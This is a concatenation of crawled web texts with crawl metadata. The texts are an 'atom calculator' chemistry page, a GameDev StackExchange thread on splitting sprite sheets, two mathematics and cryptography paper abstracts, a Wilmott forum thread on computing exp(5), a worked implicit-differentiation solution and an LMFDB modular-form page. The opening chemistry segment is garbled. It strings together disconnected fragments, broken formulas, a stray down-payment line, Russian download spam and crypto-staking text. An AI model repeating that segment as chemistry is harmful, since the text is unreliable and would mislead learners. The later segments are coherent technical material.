Diamagnetic Materials create an induced magnetic field in a direction opposite to an externally applied magnetic field and are therefore repelled by the applied magnetic field. 7 : Calculate (1) the frequency and (2) the energy per quantum for electromagnetic radiation having a wavelength of 580 nm. Fe 2 O 3(s) + 3CO (g) ===> 2Fe (l) + 3CO 2(g) Using the atomic masses of Fe = 56, C = 12, O = 16, we can calculate the atom economy for extracting iron. This calculation is based on the idea of an atom as a sphere, which isn't precisely accurate. This online calculator you can use for computing the average molecular weight (MW) of molecules by entering the chemical formulas (for example C3H4OH(COOH)3). The 3 main subatomic particles that make up the atom are the proton, neutron and electron. If one of the atom is electronegative, it has more tendency to attract the electrons. The operator of the kinetic energy in spherical coordinates for all s orbitals is: 1d2 2 d 2 dr + r d 1 dr. How to Use Grams to Atoms Calculator? The procedure to use the grams to atoms calculator is as follows: Step 1: Enter the atomic mass number, grams and x in the respective input field. Begin: Step: » Moles Conversions: mol↔mmol 1 mol = 1000 mmol mol↔umol 1 mol = 1000000 umol mol↔nmol. Particle Interactions. Lets use water, H2O. alkali_atom_functions. Another way to calculate atomic volume is to use the atomic or ionic radius of an atom (depending on whether or not you are dealing with an ion). 024xx10^23)~~34. Minimum Down Payment is 60%. Atom Power Calculator - Скачать бесплатно последнюю версию, без СМС | Получите новейшие версии ваших программ. The mass and atomic fraction is the ratio of one element's mass or atom to the total mass or atom of the mixture. get_potential_energy (force_consistent = False, apply_constraint = True) [source] ¶ Calculate potential energy. 3 mol Na × (6. There are three positively charged protons outside the nucleus. Calculate the wavelength of the electron in the 5th orbit. For the general chemical reaction:. The central atom may only be bonded to one other element. 2 × 10-31 cubic meters. com tracks the staking yield, proof-of-stake metrics, blockchain data and everything useful to earn passive returns by delegating Cosmos (ATOM). Remember to use uppercase and lowercase on the name of athoms appropriately! Example: Mg {OH}2 (magnesium hydroxide) has one atom of magnesium, two atoms of oxygen and two atoms of hydrogen. Therefore, if we make a proton the size of the picture above, 1000 pixels across, then the electron orbiting this proton is located 50,000,000 pixels to the right (but could be found anywhere in the sphere around the proton at that distance). 34 10 atoms/cm [238. The number of electrons in a neutral atom is equal to the number of protons.
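Several of the conversions quoted above (moles to atoms, grams to atoms) are one-line applications of Avogadro's number; a minimal Python sketch of that arithmetic (the function names are my own, not from any of the calculators mentioned):

```python
AVOGADRO = 6.0221415e23  # atoms per mole, the exact value cited above

def moles_to_atoms(moles):
    """Moles of a substance -> number of atoms (or molecules)."""
    return moles * AVOGADRO

def grams_to_atoms(grams, molar_mass):
    """Mass in grams -> number of atoms, via the molar mass in g/mol."""
    return grams / molar_mass * AVOGADRO

print(moles_to_atoms(0.3))         # ~1.8e23, the sodium example above
print(grams_to_atoms(12.0, 12.0))  # one mole of carbon-12: ~6.022e23 atoms
```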
2021-04-12 22:24:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.519125759601593, "perplexity": 1014.8932781256763}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038069267.22/warc/CC-MAIN-20210412210312-20210413000312-00283.warc.gz"}
https://gamedev.stackexchange.com/questions/34055/how-can-i-unpack-a-sprite-sheet-into-multiple-images/66508
# How can I unpack a sprite sheet into multiple images? [closed] I need to take a sprite sheet and convert it into multiple images, one for each frame of the sprite sheet. How should I go about this? I would prefer an offline method or a tool to do so -- I found Alferd SpriteSheet Unpacker, but it is really slow on Windows 7 and does not seem to respond well at all. • I reworded your question so it is asking how to solve (what I presume to be) your specific problem rather than asking for a list of tools others are using, as the latter type of question is a poor fit for this site. – user1430 Aug 11 '12 at 18:54 • I'm the author of 'Alferd Spritesheet Unpacker'; can you post a link to the spritesheet you're trying to unpack and I'll see why it's so slow. I developed and tested it on Windows 7 so that shouldn't be an issue. – ForkandBeard Aug 12 '12 at 8:29 • @ForkandBeard Here is the spritesheet: i.imgur.com/R1MPY.png. When I click on Select All > Export Selected, nothing seems to happen; it just hangs, and I tried sleeping on it but no luck. – Aivan Monceller Aug 12 '12 at 9:01 • @AivanMonceller thanks for posting the spritesheet. It's really small; I managed to unpack it in under a second running on Windows 7. I can't replicate the issue; all I can suggest is make sure you're using ASU version 8 and you have permission to write to the folder you're trying to export to... – ForkandBeard Aug 12 '12 at 9:25 • If you don't mind an online solution, imagesplitter.net is as easy as it gets (provided the spritesheet is actually a regular grid, like the one you've posted). Just upload your image, select the SPLIT IMAGE tab, choose the number of rows and columns (and the image format) - and that's pretty much it. – JustACluelessNewbie May 9 '14 at 8:02 I just can't replicate the issue with FolderBrowserDialog.ShowDialog hanging, so I've created a new version of the app (version 9) which has a new 'Prompt for Export Folder' option. Unchecking this option removes the need for the dialog box. You can download version 9 from my site, Alferd Spritesheet Unpacker version 9. On the 'Options' form untick the 'Prompt for Export Folder' check box and now ASU will just export the files to whatever directory path is in the long textbox at the bottom of the main form. (If you don't want to change this option every time you can set PromptForDestinationFolder to false in the .exe.config file.) • Unfortunately, even with the PromptForDestinationFolder unchecked, it still hangs. I am testing with this spritesheet (note that I converted it to PNG before dragging it into your unpacker): funorb.com/img/images/game/central/dev_diary/… – Samaursa Jun 29 '13 at 21:20 • It also hangs when I click about... in options. I am guessing the program has trouble opening additional windows. – Samaursa Jun 29 '13 at 21:22 • @ForkandBeard. FYI, I think I experienced this issue on Windows 10, but I was able to work around it by clicking Alt+Tab. Apparently, the "Select Folder" dialog was showing up, but did not steal focus from the main window. And, since the main window was waiting for the dialog, it seemed "frozen." – jpaugh Mar 31 at 21:04 Shoebox is a great tool for this purpose and rather flexible. http://renderhjs.net/shoebox/extractSprites.htm It's AIR-based, so you can use it on OSX or Windows. It's drag/drop automagic at its best.
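For a sheet that really is a regular grid, like the one linked above, the unpacking can also be scripted offline; a minimal sketch using the Pillow library (the tile size and output file names here are assumptions, adjust to the actual sheet):

```python
from PIL import Image  # pip install Pillow

def unpack_sheet(path, tile_w, tile_h, out_prefix="frame"):
    """Slice a regular-grid sprite sheet into individual frame images."""
    sheet = Image.open(path)
    cols, rows = sheet.width // tile_w, sheet.height // tile_h
    for r in range(rows):
        for c in range(cols):
            box = (c * tile_w, r * tile_h, (c + 1) * tile_w, (r + 1) * tile_h)
            sheet.crop(box).save(f"{out_prefix}_{r}_{c}.png")

# Example: a sheet of 32x32 frames (hypothetical grid dimensions).
unpack_sheet("spritesheet.png", 32, 32)
```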
2019-12-14 09:36:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2561033070087433, "perplexity": 1809.8395658841066}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540585566.60/warc/CC-MAIN-20191214070158-20191214094158-00113.warc.gz"}
https://www.aimsciences.org/article/doi/10.3934/dcds.2015.35.4415
# Stratified discontinuous differential equations and sufficient conditions for robustness

• This paper is concerned with state-constrained discontinuous ordinary differential equations for which the corresponding vector field has a set of singularities that forms a stratification of the state domain. Existence of solutions and robustness with respect to external perturbations of the right-hand term are investigated. Moreover, notions of regularity for stratifications are discussed. Mathematics Subject Classification: Primary: 34A12, 34A36; Secondary: 34D10.
2022-11-29 20:34:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.7458863854408264, "perplexity": 3010.2129395063002}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710711.7/warc/CC-MAIN-20221129200438-20221129230438-00357.warc.gz"}
https://forum.wilmott.com/viewtopic.php?t=79451&start=60
SERVING THE QUANTITATIVE FINANCE COMMUNITY • 1 • 3 • 4 • 5 • 6 • 7 • 37 Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: CuchulainnYou can use the fact that exp(x+y) = exp(x)exp(y) (school A level?) and induction to show exp(5) = exp(1)^5 = exp(2)^2*exp(1) == exp(2)*exp(2)*exp(1)Looks like a special case of algos from Pingala's Chandah-sutra. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget SierpinskyJanitor Posts: 1069 Joined: March 29th, 2005, 12:55 pm ### exp(5) = $e^5$ this way? Last edited by SierpinskyJanitor on September 15th, 2011, 10:00 pm, edited 1 time in total. Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ QuoteOriginally posted by: outrunQuoteOriginally posted by: CuchulainnQuoteOriginally posted by: CuchulainnYou can use the fact that exp(x+y) = exp(x)exp(y) (school A level?) and induction to show exp(5) = exp(1)^5 = exp(2)^2*exp(1) == exp(2)*exp(2)*exp(1)Looks like a special case of algos from Pingala's Chandah-sutra.thats binary expansion used in exponentiation by squaringYes Sir, that's it. A similar and common variation is to compute exp(f(x))) where f(x) is an integral f(x) = Integral([0,x], g) where g is a function. Typically, the x vars are monotonic increasing mesh points. But instead of 'exponent' decomposition we get some interval decomposition? Last edited by Cuchulainn on September 15th, 2011, 10:00 pm, edited 1 time in total. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact: ### exp(5) = $e^5$ A good example is when you remove lower-order terms in an ODE. Then "wlog"a(x)dv/dx + b(x)v = f(x)can be reduced to the formA(x)d(B(x)v)/dx = F(x)by a suitable integrating factor which in general is the exponential of some integral. Sometimes you can evaluate it exactly, e.g. when a(X) = x^2, b(x) = x. But in general, we get exponential of a sum of discretre function values, many of which can be reused. I could use STL algo partial_sum().For 2nd order ODE it is nice when we can use the same technique and remove the convection term.au_xx + bu_x = f==>av_x + bv = fu_x = v Last edited by Cuchulainn on September 17th, 2011, 10:00 pm, edited 1 time in total. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget supernova Posts: 12 Joined: October 19th, 2003, 3:44 am ### exp(5) = $e^5$ (1+5/n)^n, take n enough to achieve the desired decimal accuracy katastrofa Posts: 8992 Joined: August 16th, 2007, 5:36 am Location: Alpha Centauri ### exp(5) = $e^5$ I would multiply (e*e)^2*e in columns like in primary school - it goes very fast (but my husband told me not to admit to people how many digits of Euler's number I know by heart ;-/)2.71828 will do :-)BTW, there's a similar problem with convergence of the exp function in physics, when one wants to calculate the exponent of a matrix (e.g. the evolution operator). What's usually done is first calculating B = exp(A/n) and then B^n... or using a Padé approximant.a Last edited by katastrofa on September 25th, 2011, 10:00 pm, edited 1 time in total. 
Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact:

### exp(5) = $e^5$

Quote, originally posted by katastrofa: "I would multiply (e*e)^2*e in columns like in primary school - it goes very fast (but my husband told me not to admit to people how many digits of Euler's number I know by heart ;-/). 2.71828 will do :-) BTW, there's a similar problem with convergence of the exp function in physics, when one wants to calculate the exponent of a matrix (e.g. the evolution operator). What's usually done is first calculating B = exp(A/n) and then B^n... or using a Padé approximant." 19 dubious ways to calculate exp(A) http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget

katastrofa Posts: 8992 Joined: August 16th, 2007, 5:36 am Location: Alpha Centauri

### exp(5) = $e^5$

Quote, originally posted by Cuchulainn: "19 dubious ways to calculate exp(A)" Yup, p. 10, Method 3. Scaling and squaring: exp(A/m) -> Taylor expansion/Padé approximant -> (.)^m usually works best - at least for me (or A is normal and can be diagonalised). Sorry, I hijacked the thread :-) a Last edited by katastrofa on September 26th, 2011, 10:00 pm, edited 1 time in total.

Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact:

### exp(5) = $e^5$

Quote, originally posted by katastrofa: "Yup, p. 10, Method 3. Scaling and squaring: exp(A/m) -> Taylor expansion/Padé approximant -> (.)^m usually works best - at least for me (or A is normal and can be diagonalised). Sorry, I hijacked the thread :-)" Great! Thanks for the input http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget

Cuchulainn Posts: 61624 Joined: July 16th, 2004, 7:38 am Location: Amsterdam Contact:

### exp(5) = $e^5$

Quote, originally posted by supernova: "(1+5/n)^n, take n large enough to achieve the desired decimal accuracy" Is there a fast way to compute (1+1/n)^n to a given accuracy? (using a Cauchy sequence?) Then we can use the Pingala's Chandah-sutra technique already alluded to. The interview allows 5 minutes. Last edited by Cuchulainn on September 26th, 2011, 10:00 pm, edited 1 time in total. http://www.datasimfinancial.com http://www.datasim.nl Every Time We Teach a Child Something, We Keep Him from Inventing It Himself Jean Piaget

DevonFangs Posts: 3004 Joined: November 9th, 2009, 1:49 pm

### exp(5) = $e^5$

Quote, originally posted by katastrofa: "BTW, there's a similar problem with convergence of the exp function in physics, when one wants to calculate the exponent of a matrix (e.g. the evolution operator). What's usually done is first calculating B = exp(A/n) and then B^n... or using a Padé approximant." Not that it's really relevant, but this reminds me of the Lie-Trotter formula. One can construct a naturally time-ordered evolution operator and integrate the Schroedinger eqn efficiently from there in a fancy way.

Polter Posts: 2526 Joined: April 29th, 2008, 4:55 pm

### exp(5) = $e^5$

Quote, originally posted by Cuchulainn, quoting supernova's "(1+5/n)^n, take n large enough to achieve the desired decimal accuracy": "Is there a fast way to compute (1+1/n)^n to a given accuracy? (using a Cauchy sequence?).
Then we can use the Pingala's Chandah-sutra technique already alluded to. The interview allows 5 minutes." Rough idea: denote our error-of-approximation function by f(x; n) := e^x - (1 + x/n)^n. A power series expansion of the above, accurate to order x^3 (that's not very high, but it's probably a good idea to sacrifice some accuracy and settle for lower order in an interview setting ;]), gives f(x; n) ≈ e^x (x^2/(2n) - x^3/(3n^2)). So, for our x = 1 the error-of-approximation behaves roughly like e/(2n). From this one can see that to reduce the order of approximation error by magnitude "m" we have to increase "n" roughly by the same "m" (a nice inverse relationship). Some numerical illustration of the above: f(1; 10) = 0.124539, f(1; 100) = 0.013468, f(1; 1000) = 0.0013579 (and we have to stop right here). Last edited by Polter on September 27th, 2011, 10:00 pm, edited 1 time in total.
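Polter's numbers, and the leading-order error reconstructed above, can be checked directly; a small sketch:

```python
import math

def f(x, n):
    """Error of the (1 + x/n)^n approximation to exp(x)."""
    return math.exp(x) - (1 + x / n) ** n

for n in (10, 100, 1000):
    est = math.e * (1 / (2 * n) - 1 / (3 * n**2))  # series estimate to order x^3
    print(n, f(1, n), est)
# The pairs agree to within ~2%:
# (0.12454, 0.12685), (0.013468, 0.013501), (0.0013579, 0.0013582)
```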
2020-04-10 09:28:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7909892797470093, "perplexity": 5700.078940095724}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371893683.94/warc/CC-MAIN-20200410075105-20200410105605-00398.warc.gz"}
http://www.gradesaver.com/textbooks/math/calculus/calculus-10th-edition/chapter-2-differentiation-2-5-exercises-page-146/45
## Calculus 10th Edition $\dfrac{d^2y}{dx^2}=-\dfrac{4}{y^3}.$ First derivative (differentiating $x^2+y^2=4$ implicitly): $\dfrac{d}{dx}(x^2)+\dfrac{d}{dx}(y^2)=\dfrac{d}{dx}(4)\rightarrow$ $2x+\dfrac{dy}{dx}(2y)=0\rightarrow$ $\dfrac{dy}{dx}=-\dfrac{x}{y}$ Second derivative (quotient rule, then substitute $\dfrac{dy}{dx}=-\dfrac{x}{y}$ and use $x^2+y^2=4$): $\dfrac{d}{dx}(\dfrac{dy}{dx})=\dfrac{d}{dx}(-\dfrac{x}{y})\rightarrow$ $\dfrac{d^2y}{dx^2}=-\dfrac{y-(\dfrac{dy}{dx})(x)}{y^2}=-\dfrac{y+\frac{x^2}{y}}{y^2}=-\dfrac{y^2+x^2}{y^3}=-\dfrac{4}{y^3}.$
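The result can also be verified symbolically; a quick sketch using SymPy's idiff (an illustrative script, not part of the textbook solution):

```python
from sympy import symbols, idiff, simplify

x, y = symbols("x y")
curve = x**2 + y**2 - 4        # the circle x^2 + y^2 = 4

d2 = idiff(curve, y, x, 2)     # second implicit derivative d^2y/dx^2
print(simplify(d2))                        # expect -(x**2 + y**2)/y**3
print(simplify(d2.subs(x**2, 4 - y**2)))   # expect -4/y**3 on the curve
```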
2017-10-18 15:22:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9966131448745728, "perplexity": 5993.1562636662875}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187822992.27/warc/CC-MAIN-20171018142658-20171018162658-00353.warc.gz"}
https://eprint.iacr.org/2015/1067
#### Paper 2015/1067

Vladimir Kolesnikov and Alex J. Malozemoff

##### Abstract

The covert security model (Aumann and Lindell, TCC 2007) offers an important security/efficiency trade-off: a covert player may arbitrarily cheat, but is caught with a certain fixed probability. This permits more efficient protocols than the malicious setting while still giving meaningful security guarantees. However, one drawback is that cheating cannot be proven to a third party, which prevents the use of covert protocols in many practical settings. Recently, Asharov and Orlandi (ASIACRYPT 2012) enhanced the covert model by allowing the honest player to generate a \emph{proof of cheating}, checkable by any third party. Their model, which we call the PVC (\emph{publicly verifiable covert}) model, offers a very compelling trade-off. Asharov and Orlandi (AO) propose a practical protocol in the PVC model, which, however, relies on a specific expensive oblivious transfer (OT) protocol incompatible with OT extension. In this work, we improve the performance of the PVC model by constructing a PVC-compatible OT extension as well as making several practical improvements to the AO protocol. As compared to the state-of-the-art OT extension-based two-party covert protocol, our PVC protocol adds relatively little: four signatures and an $\approx 67\%$ wider OT extension matrix. This is a significant improvement over the AO protocol, which requires public-key-based OTs per input bit. We present detailed estimates showing (up to orders of magnitude) concrete performance improvements over the AO protocol and a recent malicious protocol.

Note: This is the full version of the proceedings version published at ASIACRYPT 2015.

Category: Cryptographic protocols. Publication info: a major revision of an IACR publication in ASIACRYPT 2015. Keywords: secure computation, publicly verifiable covert security. Contact author(s): amaloz @ cs umd edu. Short URL: https://ia.cr/2015/1067. License: CC BY.

BibTeX:

@misc{cryptoeprint:2015/1067,
  author = {Vladimir Kolesnikov and Alex J. Malozemoff},
  howpublished = {Cryptology ePrint Archive, Paper 2015/1067},
  year = {2015},
  url = {https://eprint.iacr.org/2015/1067}
}
2022-11-30 15:07:10
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.37341153621673584, "perplexity": 6768.94117110041}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710764.12/warc/CC-MAIN-20221130124353-20221130154353-00577.warc.gz"}
https://www.lmfdb.org/ModularForm/GL2/Q/holomorphic/1323/2/a/y/
Properties

Label: 1323.2.a.y
Level: $1323$
Weight: $2$
Character orbit: 1323.a
Self dual: yes
Analytic conductor: $10.564$
Analytic rank: $1$
Dimension: $3$
CM: no
Inner twists: $1$

Related objects

Newspace parameters

Level: $$N$$ $$=$$ $$1323 = 3^{3} \cdot 7^{2}$$
Weight: $$k$$ $$=$$ $$2$$
Character orbit: $$[\chi]$$ $$=$$ 1323.a (trivial)

Newform invariants

Self dual: yes
Analytic conductor: $$10.5642081874$$
Analytic rank: $$1$$
Dimension: $$3$$
Coefficient field: 3.3.321.1
Defining polynomial: $$x^{3} - x^{2} - 4 x + 1$$
Coefficient ring: $$\Z[a_1, a_2]$$
Coefficient ring index: $$1$$
Twist minimal: no (minimal twist has level 189)
Fricke sign: $$1$$
Sato-Tate group: $\mathrm{SU}(2)$

$q$-expansion

Coefficients of the $$q$$-expansion are expressed in terms of a basis $$1,\beta_1,\beta_2$$ for the coefficient ring described below. We also show the integral $$q$$-expansion of the trace form.

$$f(q)$$ $$=$$ $$q + ( -1 + \beta_{1} ) q^{2} + ( 2 - \beta_{1} + \beta_{2} ) q^{4} -\beta_{2} q^{5} + ( -4 + \beta_{1} - 2 \beta_{2} ) q^{8} +O(q^{10})$$

$$q + ( -1 + \beta_{1} ) q^{2} + ( 2 - \beta_{1} + \beta_{2} ) q^{4} -\beta_{2} q^{5} + ( -4 + \beta_{1} - 2 \beta_{2} ) q^{8} + ( 1 - \beta_{1} + \beta_{2} ) q^{10} + ( -2 - \beta_{1} ) q^{11} + ( -1 + 2 \beta_{1} + \beta_{2} ) q^{13} + ( 5 - 4 \beta_{1} + \beta_{2} ) q^{16} + ( 1 - \beta_{1} + 2 \beta_{2} ) q^{17} + ( -1 - \beta_{1} + \beta_{2} ) q^{19} + ( -5 + 2 \beta_{1} ) q^{20} + ( -1 - 2 \beta_{1} - \beta_{2} ) q^{22} + ( -2 - \beta_{1} - \beta_{2} ) q^{23} + ( -1 - \beta_{1} - 2 \beta_{2} ) q^{25} + ( 6 + \beta_{2} ) q^{26} + ( -4 + \beta_{1} + 2 \beta_{2} ) q^{29} + ( 3 - 2 \beta_{1} - \beta_{2} ) q^{31} + ( -10 + 4 \beta_{1} - \beta_{2} ) q^{32} + ( -6 + 3 \beta_{1} - 3 \beta_{2} ) q^{34} + ( -3 - \beta_{1} - 2 \beta_{2} ) q^{37} + ( -3 - 2 \beta_{2} ) q^{38} + ( 9 - 3 \beta_{1} ) q^{40} + ( 2 - 5 \beta_{1} - \beta_{2} ) q^{41} + ( -4 + 3 \beta_{1} ) q^{43} -\beta_{2} q^{44} -3 \beta_{1} q^{46} + ( 2 + 4 \beta_{1} + \beta_{2} ) q^{47} + ( -3 \beta_{1} + \beta_{2} ) q^{50} + ( -5 + 3 \beta_{1} - 3 \beta_{2} ) q^{52} + ( -7 - 2 \beta_{1} + \beta_{2} ) q^{53} + ( -1 + \beta_{1} + 2 \beta_{2} ) q^{55} + ( 5 - 2 \beta_{1} - \beta_{2} ) q^{58} + ( -5 - \beta_{1} - \beta_{2} ) q^{59} + ( -1 + 2 \beta_{1} - 2 \beta_{2} ) q^{61} + ( -8 + 2 \beta_{1} - \beta_{2} ) q^{62} + ( 13 - 3 \beta_{1} + 3 \beta_{2} ) q^{64} + ( -2 - \beta_{1} + 3 \beta_{2} ) q^{65} + ( 4 + \beta_{1} - \beta_{2} ) q^{67} + ( 16 - 7 \beta_{1} + 2 \beta_{2} ) q^{68} + ( 3 - 3 \beta_{1} + 3 \beta_{2} ) q^{71} + ( -5 \beta_{1} + 2 \beta_{2} ) q^{73} + ( 2 - 5 \beta_{1} + \beta_{2} ) q^{74} + ( 7 - 3 \beta_{1} ) q^{76} + ( 2 + 3 \beta_{1} + 3 \beta_{2} ) q^{79} + ( -8 + 5 \beta_{1} - 3 \beta_{2} ) q^{80} + ( -16 + \beta_{1} - 4 \beta_{2} ) q^{82} + ( 6 \beta_{1} + 3 \beta_{2} ) q^{83} + ( -9 + 3 \beta_{1} + 3 \beta_{2} ) q^{85} + ( 13 - 4 \beta_{1} + 3 \beta_{2} ) q^{86} + ( 3 + 3 \beta_{1} + 3 \beta_{2} ) q^{88} + ( -3 - 4 \beta_{2} ) q^{89} + ( -5 + 2 \beta_{1} - \beta_{2} ) q^{92} + ( 9 + 3 \beta_{1} + 3 \beta_{2} ) q^{94} + ( -5 + 2 \beta_{1} + 3 \beta_{2} ) q^{95} + ( 6 - 2 \beta_{1} + 2 \beta_{2} ) q^{97} +O(q^{100})$$

$$\operatorname{Tr}(f)(q)$$ $$=$$ $$3q - 2q^{2} + 4q^{4} + q^{5} - 9q^{8} + O(q^{10})$$

$$3q - 2q^{2} + 4q^{4} + q^{5} - 9q^{8} + q^{10} - 7q^{11} - 2q^{13} + 10q^{16} - 5q^{19} - 13q^{20} - 4q^{22} - 6q^{23} - 2q^{25} + 17q^{26} - 13q^{29} + 8q^{31} - 25q^{32} - 12q^{34} - 8q^{37} - 7q^{38} + 24q^{40} + 2q^{41} - 9q^{43} + q^{44} - 3q^{46} + 9q^{47} - 4q^{50} - 9q^{52}
- 24q^{53} - 4q^{55} + 14q^{58} - 15q^{59} + q^{61} - 21q^{62} + 33q^{64} - 10q^{65} + 14q^{67} + 39q^{68} + 3q^{71} - 7q^{73} + 18q^{76} + 6q^{79} - 16q^{80} - 43q^{82} + 3q^{83} - 27q^{85} + 32q^{86} + 9q^{88} - 5q^{89} - 12q^{92} + 27q^{94} - 16q^{95} + 14q^{97} + O(q^{100})$$

Basis of coefficient ring in terms of a root $$\nu$$ of $$x^{3} - x^{2} - 4 x + 1$$:

$$\beta_{0}$$ $$=$$ $$1$$
$$\beta_{1}$$ $$=$$ $$\nu$$
$$\beta_{2}$$ $$=$$ $$\nu^{2} - \nu - 3$$

$$1$$ $$=$$ $$\beta_0$$
$$\nu$$ $$=$$ $$\beta_{1}$$
$$\nu^{2}$$ $$=$$ $$\beta_{2} + \beta_{1} + 3$$

Embeddings

For each embedding $$\iota_m$$ of the coefficient field, the values $$\iota_m(a_n)$$ are shown below. For more information on an embedded modular form you can click on its label.

Label  $$\iota_m(\nu)$$  $$a_{2}$$  $$a_{3}$$  $$a_{4}$$  $$a_{5}$$  $$a_{6}$$  $$a_{7}$$  $$a_{8}$$  $$a_{9}$$  $$a_{10}$$
1.1  −1.69963  −2.69963  0  5.28799  −1.58836  0  0  −8.87636  0  4.28799
